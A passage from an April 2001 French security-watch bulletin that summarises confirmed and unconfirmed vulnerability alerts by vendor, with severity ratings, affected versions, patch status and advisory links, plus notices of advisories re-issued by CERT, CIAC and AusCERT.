Correctif existant Commandes 'size' et 'mdtm' Utilisation des commandes au delà des limites imposées<br />
@Stake<br />
http://www.atstake.com/research/advisories/2001/index_q2.html#040301-1<br />
HP<br />
Débordement de buffer dans le démon ntp 'xntpd'<br />
Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte le démon ntp 'xntpd' sous HP-UX.<br />
Critique 07/04 HP-UX versions 10.xx et 11.xx sous HP9000 séries 700 et 800<br />
Correctif existant Argument 'readvar' Débordement de buffer<br />
HPSBUX0104-148 http://europe-support.external.hp.com/<br />
Défaut de fonctionnalités dans la commande 'newgroup'<br />
La commande 'newgrp' comporte un défaut dans ses fonctionnalités.<br />
Moyenne 26/03 HP-UX version 11.11 sur serveurs HP9000<br />
Correctif existant Commande 'newgrp' Mauvais fonctionnement de la commande<br />
HPSBUX0103-147 http://europe-support2.external.hp.com/<br />
IP FILTER<br />
Vulnérabilité dans 'IP FILTER'<br />
Une vulnérabilité dans 'IP FILTER' peut autoriser un utilisateur distant à passer un paquet au travers des filtres.<br />
Critique 09/04 IP FILTER toutes versions sauf 3.3.22 ou 3.4.17<br />
Correctif existant Cache de fragments Contournement du filtrage<br />
Linux Security http://www.linuxsecurity.com/advisories/other_advisory-1265.html<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/174913<br />
IPLANET<br />
Débordement de buffer dans 'iWS'<br />
Un défaut d'implémentation dans la redirection des requêtes HTTP peut autoriser un utilisateur distant à accéder à<br />
des informations sensibles sur un serveur 'iWS' (iPlanet Web Server).<br />
Critique 17/04 IPlanet WSE Edition V4.0 et 4.1 sous Solaris 2.6, 7, 8, Windows NT 4.0, 2000, Linux 2.2 et 2.4.<br />
Correctif existant Défaut d'implémentation Débordement de buffer<br />
@Stake<br />
http://www.atstake.com/research/advisories/2001/index_q2.html#041601-1<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 25/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LINUX<br />
Vulnérabilité dans 'NetFilter'<br />
Il est possible de se connecter à distance en modifiant les entrées 'IPTables'.<br />
Critique 17/04 Pare-feux utilisant Linux (noyau 2.4.x) avec 'IPTables'<br />
Correctif existant Fonction 'ip_conntrack_ftp.c' Journalisation de la commande 'PORT'<br />
Securiteam<br />
http://www.securiteam.com/unixfocus/Security_flaw_in_Linux_s_IPTables_using_FTP_PORT__Exploit_.html<br />
Vulnérabilité dans 'ptrace' et 'execve'<br />
Une vulnérabilité dans 'ptrace' et 'execve' permet d'obtenir un interpréteur de commande sous les droits 'root' en<br />
local.<br />
Forte 27/03 Noyaux Linux jusqu'à la version 2.2.18 incluse<br />
Correctif existant 'ptrace' et 'execve' Conflit d'accès au ressources (race condition)<br />
Bugqtraq<br />
http://www.securityfocus.com/archive/1/171708<br />
Multiples vulnerabilités noyau ('kernel')<br />
De multiples vulnerabilités affectent les noyaux Debian GNU/Linux 2.2 ainsi que Red Hat 6.2 et 7.0.<br />
Forte 16/04 Debian GNU Linux 2.2 et Red Hat Linux 6.2 et 7.0<br />
Correctif existant Noyau Appels système, ptrace/exec, erreurs de conception<br />
RHSA-2001:047 http://www.redhat.com/support/errata/RHSA-2001-047.html<br />
DSA-047-1<br />
http://lists.debian.org/debian-security-announce-01/msg00046.html<br />
LINUX CALDERA<br />
Vulnérabilités dans le noyau linux ('kernel')<br />
Plusieurs vulnérabilités exploitables localement ont été révélées suite à un audit du noyau linux par Caldera.<br />
Forte 03/04 OpenLinux 2.3 (
Avril 2001<br />
MICROSOFT<br />
Débordement de buffer dans 'Visual Studio'<br />
Il existe une vulnérabilité de type débordement de buffer dans un objet 'DCOM' sous Visual Studio 6.0 Edition<br />
Enterprise. Celle-ci est exploitable à distance.<br />
Critique 27/03 Visual Studio 6.0 Edition Enterprise<br />
Correctif existant 'vbsdicli.exe' (T-SQL debugger) Débordement de buffer<br />
BindView<br />
http://razor.bindview.com/publish/advisories/adv_vbtsql.html<br />
MS01-018<br />
http://www.microsoft.com/technet/security/bulletin/MS01-018.asp<br />
Déni de service sur les serveurs 'ISA'<br />
Le service 'Web Proxy' d'un serveur ISA (Internet Security and Acceleration) est vulnérable à distance à une<br />
attaque de type déni de service.<br />
Critique 16/04 Microsoft ISA Server 2000<br />
Correctif existant Service 'Web Proxy' Mauvaise gestion des requêtes malformées<br />
MS01-021<br />
http://www.microsoft.com/technet/security/bulletin/MS01-021.asp<br />
Divulgation de mot de passe 'compression de répertoire'<br />
Les mots de passe utilisés pour protéger un répertoire lors de sa compression est stocké en clair.<br />
Forte 29/03 Microsoft Plus! 98 et Microsoft Windows Me<br />
Correctif existant Stockage des mots de passe Divulgation des mots de passe<br />
MS01-019<br />
http://www.microsoft.com/technet/security/bulletin/MS01-019.asp<br />
Exécution de code à distance via 'Internet Explorer'<br />
Il est possible d'exécuter à distance un binaire via 'Internet Explorer' en usurpant le type MIME d'un courrier<br />
électronique.<br />
Forte 30/03 Microsoft Internet Explorer 5.01 et 5.5<br />
Correctif existant Visualitation des mails HTML Mauvaise interprétation du type MIME<br />
MS01-020<br />
http://www.microsoft.com/technet/security/bulletin/MS01-020.asp<br />
Exécution de scripts avec 'WebDAV Service Provider'<br />
Un utilisateur distant peut provoquer l'exécution de scripts à destination du composant 'WebDAV Service Provider'<br />
afin d'accéder aux ressources 'WebDAV'.<br />
Forte 18/04 Microsoft Windows 95, 98, 98 SE, Me, NT 4.0 et 2000 avec 'msdaipp.dll' versions 8.102.1403.0,<br />
8.103.2402.0 et 8.103.2519.0 uniquement<br />
Correctif existant 'msdaipp.dll' Appel non autorisé du composant via un script<br />
MS01-022<br />
http://www.microsoft.com/technet/security/bulletin/MS01-022.asp<br />
Possible déni de service dans les serveurs 'ISA'<br />
Il est possible de provoquer un déni de service à distance sur les serveurs 'Internet Security and Acceleration'.<br />
Moyenne 02/04 Microsoft 'Internet Security and Acceleration' Server pourWindows 2000<br />
Correctif existant Option 'Event Log Failure' Mauvaise gestion des erreurs<br />
[def-2001-16] http://www.securityfocus.com/archive/1/173326<br />
Q284800<br />
http://support.microsoft.com/support/kb/articles/q284/8/00.ASP<br />
NCM<br />
Exposition de données sensibles dans CMS<br />
CMS 'Content Management System' de la société NCM permet d'interroger une base de données SQL.<br />
Forte 17/04 NCM Content Management)<br />
Correctif existant Script 'content.pl' Non vérification des données passées en paramètre<br />
Securiteam<br />
http://www.securiteam.com/securitynews/NCM_Content_Management_Vulnerability__SQL_.html<br />
NETSCAPE<br />
Débordement de buffer dans 'Netscape SmartDownload'<br />
Il est possible de provoquer un débordement de buffer, exploitable à distance, via l'application 'Netscape<br />
SmartDownload'.<br />
Critique 13/04 Netscape SmartDownload 1.3<br />
Correctif existant Analyse syntaxique des URLs Débordement de buffer<br />
@Stake<br />
http://www.atstake.com/research/advisories/2001/index_q2.html#041301-1<br />
Netscape<br />
http://home.netscape.com/download/smartdownload.html<br />
NETSCREEN<br />
Trafic non désiré vers la 'DMZ' sur 'NetScreen'<br />
Malgré les règles de filtrages, il est possible d'envoyer du trafic non désiré vers la 'DMZ' sur 'NetScreen'.<br />
Forte 26/03 NetScreen-10s et NetScreen-100s ScreenOS versions 1.64, 1.66, 2.01 et 2.5<br />
Correctif existant ScreenOS Non blocage du trafic<br />
NetScreen<br />
http://www.securityfocus.com/archive/1/171634<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 27/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
NTP<br />
Débordement de buffer dans le démon 'ntp'<br />
Une vulnérabilité de type débordement de buffer est exploitable à distance dans le démon 'ntp' (Network Time<br />
Protocol / port UDP et TCP 123).<br />
Critique 05/04 'ntp' version jusqu'à la 4.0.99k<br />
Linux Debian 2.2, RedHat 7.0, FreeBSD 4.2-STABLE, Solaris 2.5.1 (test sur xntpd 3.5f)<br />
Correctif existant Argument 'readvar' Débordement de buffer<br />
DSA-045-1<br />
http://lists.debian.org/debian-security-announce-01/msg00043.html<br />
SA2001-004 http://www.linuxsecurity.com/advisories/netbsd_advisory-1255.html<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/174011<br />
PDG SOFTWARE<br />
Vulnérabilité dans 'Shopping Cart'<br />
Une vulnérabilité exploitable à distance affecte 'Shopping Cart'.<br />
Moyenne 09/04 PDG Shopping Cart (toute version inférieure à 1.63)<br />
Correctif existant 'shopper.cgi' Accès au répertoire 'PDG_Cart'<br />
NIPC 01-007 http://www.nipc.gov/warnings/advisories/2001/01-007.htm<br />
PGP<br />
Exécution de code distant via 'PGP'<br />
Un utilisateur distant peut provoquer l'exécution de code à distance via 'PGP ASCII Armor parser'.<br />
Critique 09/04 PGP (Pretty Good Privacy) versions 5 à 7.0.4 pour Windows<br />
Correctif existant PGP ASCII Armor parser Création non sécurisée de fichiers arbitraires<br />
@Stake<br />
http://www.atstake.com/research/advisories/2001/index_q2.html#040901-1<br />
QUEST<br />
Vulnérabilité dans 'SharePlex'<br />
SharePlex (outil de réplication de base Oracle) contient une vulnérabilité autorisant un utilisateur local à lire tout<br />
fichier présent sur le système.<br />
Moyenne 03/04 SharePlex version 2.1.3.9 et 2.2.2 (beta)<br />
Correctif existant Script 'qview' Permissions laxistes lors de la lecture d'un fichier<br />
Securiteam<br />
http://www.securiteam.com/securitynews/Security_Hole_Found_in_SharePlex.html<br />
SAMBA<br />
Vulnérabilité de type lien symbolique dans 'samba'<br />
Une vulnérabilité de type lien symbolique affecte localement 'samba' lors de requêtes d'impression à distance.<br />
Moyenne 18/04 Debian GNU/Linux 2.2 (toutes architectures)Immunix OS 6.2, 7.0-beta et 7.0<br />
Correctif existant Lien symbolique Création dangeureuse de fichiers temporaires<br />
Debian<br />
http://www.linuxsecurity.com/advisories/debian_advisory-1295.html<br />
IMX-2001-70-016 http://www.securityfocus.com/archive/1/177371<br />
DSA-048-1<br />
http://lists.debian.org/debian-security-announce-01/msg00047.html<br />
SCO<br />
Débordement de buffer dans de nombreuses commandes<br />
De nombreuses commandes associées aux services d'impression et de mail sont affectées par un débordement de<br />
buffer.<br />
Moyenne 12/04 SCO OpenServer versions 5.0.0 à 5.0.6<br />
Correctif existant Services d'impression et de mail Débordement de buffer<br />
SCO [SSE072B] ftp://ftp.sco.com/SSE/sse072b.ltr<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/176080<br />
SUN<br />
Agent de déni de service distribué 'CARKO'<br />
Le SANS publie, via le GIAC, une note d'alerte au sujet du nouvel agent de déni de service distribué appelé<br />
'CARKO'.<br />
Critique 16/04 Sun Solaris 2.6, 7 et 8<br />
Correctif existant démon 'snmpXdmid' Outil de déni de service distribué 'CARKO'<br />
CERT CA-2001-05 http://www.<strong>cert</strong>.org/advisories/CA-2001-05.html<br />
SANS<br />
http://www.sans.org/y2k/carko.htm<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 28/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
WATCHGUARD<br />
Déni de service dans les pare-feux 'Firebox II'<br />
Une vulnérabilité de type déni de service, exploitable à distance, affecte les pare-feux 'Firebox II'.<br />
Forte 05/04 Watchguard Firebox IIFirmware versions inférieures à 4.6<br />
Correctif existant Protocole Mauvaise gestion d'un important flot de requêtes malformées<br />
[def-2001-18] http://www.securityfocus.com/archive/1/174347<br />
ALERTES NON CONFIRMEES<br />
Les alertes présentées dans les tables de synthèse suivantes ont été publiées dans diverses listes<br />
d’information mais n’ont pas encore fait l’objet d’une annonce ou d'un correctif de la part de l'éditeur. Ces<br />
alertes nécessitent la mise en place d’un processus de suivi et d’observation.<br />
AXENT<br />
Vulnérabilité dans 'Raptor'<br />
Raptor firewall comporte une vulnérabilité dans la redirection des requêtes 'HTTP'.<br />
Forte 24/03 Raptor firewall 6.5<br />
Correctif existant Redirection des requêtes HTTP Accès aux ports TCP autorisant HTTP (ports 79-99 / 200-65535)<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/171335<br />
BINTEC<br />
Déni de service dans les routeurs 'X4000'<br />
Une vulnérabilité de type déni de service affecte les routeurs 'X4000' de la société BinTec.<br />
Moyenne 04/04 BinTec X4000 avec firmware 5.1.6 Patch 10 et inférieurs(bootimage et logicware 1.05)<br />
Aucun correctif 'nmap' Blocage du routeur lors du sondage 'nmap'<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/174077<br />
CA<br />
Vulnérabilité dans 'CCC/Harvest'<br />
CCC Harvest est un outil utilisé afin de synchroniser et contrôler les accès au code source partagé par une équipe<br />
de développement.<br />
Forte 28/03 CCCv5.0 (testé sous Windows 2000)<br />
Aucun correctif Chiffrement du mot de passe Faiblesse de chiffrement<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/172392<br />
CFINGERD<br />
Débordement de buffer dans 'cfingerd'<br />
Une vulnérabilité de type débordement de buffer, exploitable à distance, affecte 'cfingerd'.<br />
Forte 13/04 Linux Debian 2.1 et 2.2 (plateforme de test)<br />
Correctif existant fonction 'syslog()' Débordement de buffer<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/176087<br />
CISCO<br />
Déni de service dans 'PIX Firewall 5.1'<br />
Une vulnérabilité de type déni de service, exploitable à distance, affecte les pare-feux 'PIX Firewall 5.1'.<br />
Forte 06/04 CISCO PIX Firewall 515 et 520 firmware 5.1.4<br />
Aucun correctif Authentification aaa Mauvaise gestion d'un trop grand nombre d'authentifications<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/174577<br />
IBM<br />
Deux vulnérabilités dans 'Websphere/NetCommerce3'<br />
Le serveur 'Websphere/NetCommerce3' contient deux vulnérabilités exploitables à distance.<br />
Forte 15/04 IBM Websphere/NetCommerce3 version 3.1.2<br />
Aucun correctif Macro 'macro.d2w' Mauvaise gestion des requêtes malformées<br />
Securityfocus http://www.securityfocus.com/bid/2588<br />
Securiteam<br />
http://www.securiteam.com/securitynews/IBM_WebSphere_Vulnerable_to_Two_New_Holes__ExecMacro__D<br />
oS_.html<br />
IPLANET<br />
Exposition de mot de passe dans 'iPlanet Calendar'<br />
Le nom et mot de passe NAS LDAP sont stockés en clair dans un fichier de configuration dans 'iPlanet Calendar'.<br />
Forte 18/04 iPlanet calendar server 5.0p2<br />
Aucun correctif Accès au fichier de configuration Enregistrement en clair du nom et mot de passe NAS LDAPadministrateur<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/177519<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 29/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
LIGHTWAVE<br />
Attaque de type 'brute-force' sur 'ConsoleServer 3200'<br />
L'existence d'une interface de ligne de commande sur 'ConsoleServer 3200') permet une attaque de type 'bruteforce'.<br />
Forte 11/04 Lightwave Communications ConsoleServer 3200<br />
Aucun correctif 'CLI' (Command Line Interface) Attaque de type 'brute-force'<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/175502<br />
MICROSOFT<br />
Vulnérabilité 'CLSID' via 'Explorer' et 'IE'<br />
Il est possible de masquer l'extension réelle d'un fichier via 'Explorer' 'IE' si celle-ci correspond à un identifiant<br />
'CLSID'.<br />
Critique 16/04 Explorer et Internet Explorer sous Windows 98 et 2000<br />
Aucun correctif 'CLSID' (CLasS IDentifier) Non affichage des extensions de type 'CLSID'<br />
Guninski #42 http://www.guninski.com/clsidext.html<br />
Accessibilité du fichier 'user.dmp'<br />
Le fichier image généré en cas de dyfonctionnement d'une application est accessible à tous par défaut<br />
Forte 26/03 Windows NT et 2000<br />
Palliatif proposé Docteur Watson Fichier image accessible par tous en lecture<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/170952<br />
Vulnérabilité dans 'IE5' avec 'IIS' ou 'Exchange'<br />
Il existe une vulnérabilité exploitable à distance dans Microsoft Internet Explorer 5.x en interaction avec 'IIS 5.0' et<br />
'Exchange 2000'.<br />
Forte 28/03 Internet Explorer 5.x en interaction avec IIS 5.0 et Exchange 2000<br />
Aucun correctif Fichier 'MSDAIPP.DSO' Accès non sécurisé aux objets permettant l'accès à un serveur IIS 5.0<br />
Guninski #40 http://www.guninski.com/iemsdaipp.html<br />
Vulnérabilité dans 'Internet Explorer' MSScriptControl<br />
Une vulnérabilité dans Internet Explorer, exploitable à distance, permet de lire sous <strong>cert</strong>aines conditions les fichiers<br />
auxquels un tiers a accès.<br />
Forte 31/03 Microsoft Internet Explorer 5.5 (testé sous Windows 2000)<br />
Aucun correctif MSScriptControl.ScriptControl Accès non sécurisée aux fichiers<br />
Guninski #41 http://www.guninski.com/scractx.html<br />
NETOPIA<br />
Accès aux préférences systèmes par Timbuktu<br />
Il est possible d'accéder sans authentification aux préférences système d'un poste MacOS X sur lequel Timbuktu a<br />
été installé.<br />
Forte 20/04 Timbuktu sur MacOS X<br />
Correctif existant Timbuktu Preview Accessibilité aux préférences systèmes sans authentification<br />
SecureMac<br />
http://www.securemac.com/timubktuosxpreviewhole.cfm<br />
NETSCAPE<br />
Exposition d'information via Netscape<br />
Un utilisateur distant peut obtenir l'historique des pages visitées d'un tiers via Netscape.<br />
Forte 09/04 Netscape Navigator/Communicator 4.76<br />
Correctif existant Fichier 'gif' et protocole 'about' Passage de code javascript<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/175060<br />
ORACLE<br />
Débordement de buffer dans 'Oracle Application Server'<br />
Il existe un débordement de buffer exploitable à distance dans la bibliothèque fournie avec OAS 4.0.8.2 (Oracle<br />
Application Server) et utilisée par 'iWS' (iPlanet Web Server).<br />
Forte 10/04 Oracle Application Server 4.0.8.2 avec Serveur web iPlanet Web Server 4.0/4.1 sous Sparc/Solaris 2.7<br />
Aucun correctif Bibliothèque 'ndwfn4.so' Débordement de buffer<br />
SAFER 0016 http://www.safermag.com/advisories/0016.html<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 30/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
PGP<br />
Exposition de clé partagée dans PGP Desktop Security<br />
Une option de cache permet de retrouver une clé partagée complète à partir d'une 'portion' de clé.<br />
Critique 10/04 PGP Desktop Security 7.0 (testé sous Windows 2000)<br />
Aucun correctif Option de cache Conservation en cache de clé partagée<br />
[WSIR-01/02-03] http://www.wkit.com/content/eng/advisories/wsir0123.txt<br />
QUALCOMM<br />
Vulnérabilité dans le transfert de courrier sous Eudora<br />
Une vulnérabilité dans le transfert de courrier sous 'Eudora' permet à un utilisateur distant d'obtenir des<br />
informations contenues sur le disque de la victime.<br />
Forte 18/04 Qualcomm Eudora version 5.0.2<br />
Aucun correctif Attachements Prise en compte d'attachement lors de transferts<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/177369<br />
RAYTHEON<br />
Déni de service dans 'Silent Runner Collector' (SRC)<br />
Une vulnérabilité dans 'Silent Runner Collector' peut conduire à un déni de service.<br />
Forte 30/03 Silent Runner Collector (testé sur la version 1.6.1)<br />
Aucun correctif Routines d'analyses trafic SMTP Débordement de buffer lors de l'analyse de chaînes HELO<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/172596<br />
SUN<br />
Vulnérabilité dans 'perfmon'<br />
L'utilitaire 'perfmon' peut être utilisé pour créer un quelconque fichier.<br />
Critique 26/03 Solaris 2.X<br />
Palliatif proposé Utilitaire SUID 'perfmon' Absence de contrôle sur le chemin et nom d'accès aux journaux<br />
SecuriTeam http://www.securiteam.com/unixfocus/SunOS_application_perfmon_vulnerability.html<br />
Débordement de buffer dans 'tip'<br />
Un débordement de buffer, exploitable localement, est présent dans la commande 'tip' sous Solaris.<br />
Forte 28/03 Solaris 2.5, 2.5.1, 2.6, 7 et 8<br />
Aucun correctif Variables d'environnement Débordement de buffer<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/171686<br />
Débordement de buffer dans 'ipcs'<br />
Un débordement de buffer affecte localement la commande 'ipcs'.<br />
Forte 11/04 SUN Solaris 7 (x86, probablement Sparc)<br />
Aucun correctif Variable d'environnement 'TZ' ( Débordement de buffer<br />
eEye<br />
http://www.eeye.com/html/Research/Advisories/AD20010411.html<br />
Débordement de buffer dans 'kcms_configure'<br />
Une vulnérabilité de type débordement de buffer affecte 'kcms_configure'. Un utilisateur local peut obtenir les<br />
privilèges 'root'.<br />
Forte 09/04 SUN Solaris 7 et 8 (Intel x86 et Sparc)<br />
Aucun correctif Analyse syntaxique des options Débordement de buffer<br />
eEye<br />
http://www.eeye.com/html/Research/Advisories/AD20010409.html<br />
Débordement de buffer dans 'Xsun'<br />
Un débordement de buffer exploitable localement affecte la commande 'Xsun'.<br />
Forte 10/04 SUN Solaris 7 et 8 (Intel x86 et Sparc)<br />
Aucun correctif Variables d'environement) Débordement de buffer<br />
eEye<br />
http://www.eeye.com/html/Research/Advisories/AD20010410.html<br />
SYMANTEC<br />
Déni de service dans 'Ghost'<br />
Une vulnérabilité de type déni de service affecte Symantec Ghost au travers du moteur Sybase.<br />
Forte 11/04 Symantec Ghost 6.5 pour Windows NT et 2000<br />
Aucun correctif Moteur Sybase Débordement de buffer<br />
[def-2001-21] http://www.securityfocus.com/archive/1/175661<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 31/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
TREND MICRO<br />
Vulnérabilité dans 'ScanMail' pour 'Exchange'<br />
Une vulnérabilité dans 'ScanMail' pour 'Exchange' permet de découvrir les noms et mots de passe de <strong>cert</strong>ains<br />
utilisateurs.<br />
Moyenne 30/03 ScanMail 3.5 (version d'évaluation)<br />
Palliatif proposé Base de registre Stockage des noms et mots de passe<br />
Bugtraq<br />
http://www.securityfocus.com/archive/1/173048<br />
Deux vulnérabilités dans 'Interscan VirusWall'<br />
Deux vulnérabilités exploitables à distance affectent le service 'ISADMIN' d'Interscan VirusWall.<br />
Forte 12/04 Trend Micro Interscan VirusWall 3.01 (version courante: 3.6)<br />
Aucun correctif Service 'ISADMIN' 1 - Mauvaise configuration dans le fichier 'httpd.conf'<br />
2 - Débordement de buffer<br />
EEye<br />
http://www.eeye.com/html/Research/Advisories/AD20010412.html<br />
AUTRES INFORMATIONS<br />
REPRISES D'AVIS ET CORRECTIFS<br />
Les vulnérabilités suivantes, déjà publiées, ont été mises à jour, reprises par un autre organisme, ou ont<br />
données lieu à la fourniture d'un correctif:<br />
AusCERT<br />
Reprise de l'avis Microsoft MS01-017<br />
L'AusCERT a repris, sous la référence AL-2001.04, l'avis Microsoft MS01-017 au sujet de faux <strong>cert</strong>ificats Microsoft<br />
émis par VeriSign.<br />
ftp://ftp.aus<strong>cert</strong>.org.au/pub/aus<strong>cert</strong>/advisory/AL-2001.04<br />
Reprise de l'avis SANS 'Lion Worm'<br />
L'AusCERT a repris, sous la référence AL-2001.05, l'avis du SANS au sujet du ver 'lion' exploitant la vulnérabilité<br />
'TSIG' de BIND 8.<br />
ftp://ftp.aus<strong>cert</strong>.org.au/pub/aus<strong>cert</strong>/advisory/AL-2001.05<br />
Reprise de l'avis CERT VU#648304<br />
L'AusCERT publie, sous la référence AL-2001.06, l'avis CERT VU#648304 portant sur un débordement de buffer<br />
dans le démon 'snmpXdmid' permettant le lien entre les protocoles DMI et SNMP Sun Solaris.<br />
ftp://ftp.aus<strong>cert</strong>.org.au/pub/aus<strong>cert</strong>/advisory/AL-2001.06<br />
CERT<br />
Vulnérabilité dans 'Internet Explorer' (MS01-020)<br />
Le CERT publie, sous la référence CA-2001-06, un avis relatif à la vulnérabilité affectant 'Internet Explorer' lors du<br />
traitement de documents de type MIME, décrite dans l'avis Microsoft MS01-020. Il est établit que c'est bien un objet<br />
utilisé par 'Internet Explorer' et non le navigateur qui est vulnérable. Ainsi toute application utilisant cet objet est<br />
potentiellement vulnérable. Cette alerte est aussi disponible via FedCIRC, sous la référence FA-2001-06.<br />
http://www.<strong>cert</strong>.org/advisories/CA-2001-06.htmlhttp://www2.fedcirc.gov/advisories/FA-2001-06.html<br />
CIAC<br />
Reprise de l'avis CERT CA-2001-07<br />
Le CIAC a repris, sous la référence L-070, l'avis CERT CA-2001-07 au sujet d'une vulnérabilité de type débordement<br />
de buffer lors de l'expansion de noms de fichiers. Les serveurs ftp affectés utilisent un dérivé de la fonction 'glob()',<br />
à l'origine de la vulnérabilité.<br />
http://ciac.llnl.gov/ciac/bulletins/l-070.shtml<br />
Reprise de l'avis CISCO 'CSCdt62732'<br />
Le CIAC a repris, sous la référence L-072, l'avis CISCO 'CSCdt62732'. Il est possible de provoquer à distance un<br />
déni de service en inondant de trames 802.1x le segment de réseau sur lequel se trouve le commutateur Cisco<br />
'Catalyst 5000'.<br />
http://ciac.llnl.gov/ciac/bulletins/l-072.shtml<br />
Reprise de l'avis NIPC 01-005<br />
Le CIAC a repris, sous la référence L-064, l'avis NIPC 01-005 au sujet ver ver 'lion'. Il semble en effet beaucoup<br />
plus dangereux que prévu car il ouvre de multiples portes dérobée et installe l'outil de déni de service 'tfn2k' (tribe<br />
flood network).<br />
http://ciac.llnl.gov/ciac/bulletins/l-064.shtml<br />
<strong>Veille</strong> <strong>Technologique</strong> <strong>Sécurité</strong> N°33 Page 32/59<br />
© APOGEE Communications - Tous droits réservés Diffusion restreinte aux clients abonnés aux services VTS-RAPPORT et VTS-ENTREPRISE
Avril 2001<br />
Reprise de l'avis CERT CA-2001-05<br />
Le CIAC a repris, sous la référence L-065, l'avis CERT CA-2001-05 au sujet d'une vulnérabilité exploitable à<br />
distance dans 'snmpXdmid'. Il est fortement recommandé de désactiver le démon vulnérable ainsi que les autres<br />
services RPC.<br />
http://ciac.llnl.gov/ciac/bulletins/l-065.shtml<br />
Reprise de l'avis Microsoft MS01-020<br />
Le CIAC a repris, sous la référence L-066, l'avis Microsoft MS01-020 au sujet d'une vulnérabilité affectant 'Internet<br />
Explorer' lors du traitement de documents de type MIME.<br />
http://ciac.llnl.gov/ciac/bulletins/l-066.shtml<br />
Reprise de l'avis SANS 'adore'<br />
Le CIAC a repris, sous la référence L-067, l'avis du SANS, émis par le GIAC au sujet du ver 'adore', issu des vers<br />
'ramen' et 'lion'. Ces virus s'attaquent aux récentes vulnérabilités 'wu-ftpd', 'rpc.statd', 'LPRng' et 'BIND'.<br />
http://ciac.llnl.gov/ciac/bulletins/l-067.shtml<br />
Reprise de l'avis CISCO CSCds90807<br />
Le CIAC a repris, sous la référence L-068, l'avis CISCO CSCds90807 au sujet d'une vulnérabilité dans les<br />
concentrateurs Cisco VPN 3000. Il est possible de provoquer un déni de service à distance sur les concentrateurs en<br />
leur envoyant un important flot de données au port SSL ou telnet.<br />
http://ciac.llnl.gov/ciac/bulletins/l-068.shtml<br />
Reprise de l'avis CISCO CSCdt32570<br />
Le CIAC a repris, sous la référence L-069, l'avis CISCO CSCdt32570 au sujet d'une vulnérabilité dans les<br />
commutateurs 'CSS' (Arrowpoint). Il est possible d'acquérir des droits plus élevés en soumettant une série de<br />
touches au clavier via une connexion telnet sur les commutateurs.<br />
http://ciac.llnl.gov/ciac/bulletins/l-069.shtml<br />
COMPAQ<br />
Disponibilité d'un nouveau correctif pour 'CMA'<br />
Compaq [MUPssrt0715u_cpqim_01] annonce la disponibilité d'un nouveau correctif pour 'Compaq Management<br />
Agents' sous Tru64 UNIX V4.0f, 4.0g, 5.0, 5.0a et 5.1. La non-sécurisation du trafic permettait d'infiltration un<br />
réseau privé.<br />
http://ftp.support.compaq.com/patches/public/Readmes/unix/mupssrt0715u_cpqim_01.README<br />
FREEBSD<br />
Disponibilité de plusieurs correctifs<br />
FreeBSD annonce la disponibilité des correctifs corrigeant les vulnérabilités présentes dans les paquetages:<br />
UFS/Ext2FS FreeBSD-SA-01:30<br />
ntp FreeBSD-SA-01:31<br />
IpFilter FreeBSD-SA-01:32<br />
libc/ftpd FreeBSD-SA-01:33<br />
http://www.linuxsecurity.com/advisories/<br />
HP<br />
Révision du bulletin sur 'asecure'<br />
HP révise le bulletin au sujet de 'asecure'. Certains terminaux X tels que 'Envizex II' risquent de ne plus fonctionner<br />
correctement avec les correctifs PHSS_22935 et PHSS_22936. Il est donc impératif d'utiliser pour HP-UX versions<br />
10.01, 10.10 et 10.20 : PHSS_21662 pour HP-UX version 11.00 : PHSS_21663 et de procéder aux changements<br />
suivants : '/usr/bin/chmod 444 /var/opt/audio/asecure_log' '/usr/bin/chmod 444 /var/opt/audio/audio_error_log'<br />
'asecure' [HPSBUX0103-145]<br />
http://europe-support2.external.hp.com/<br />
IBM<br />
Disponibilité de correctifs temporaires pour 'xntpd'<br />
IBM annonce, sous la référence MSS-OAR-E01-2001:138.1, la disponibilité de correctifs temporaires pour le démon<br />
ntp. Ils sont destinés à minimiser l'impact que peut avoir la vulnérabilité affectant 'xntpd'. Il était possible de<br />
provoquer un déni de service voire d'obtenir un accès 'root' distant.<br />
http://www-1.ibm.com/services/continuity/recover1.nsf/advisories/8525680F006B944585256A2C00461A4F/$file/oar138.txt<br />
ftp://aix.software.ibm.com/aix/efixes/security/xntpd_efix.tar.Z<br />
LINUX<br />
Disponibilité des correctifs pour 'samba'<br />
Trustix [2001-0005] et Caldera [CSSA-2001-015.0] annoncent la disponibilité des correctifs pour 'samba'. Il était<br />
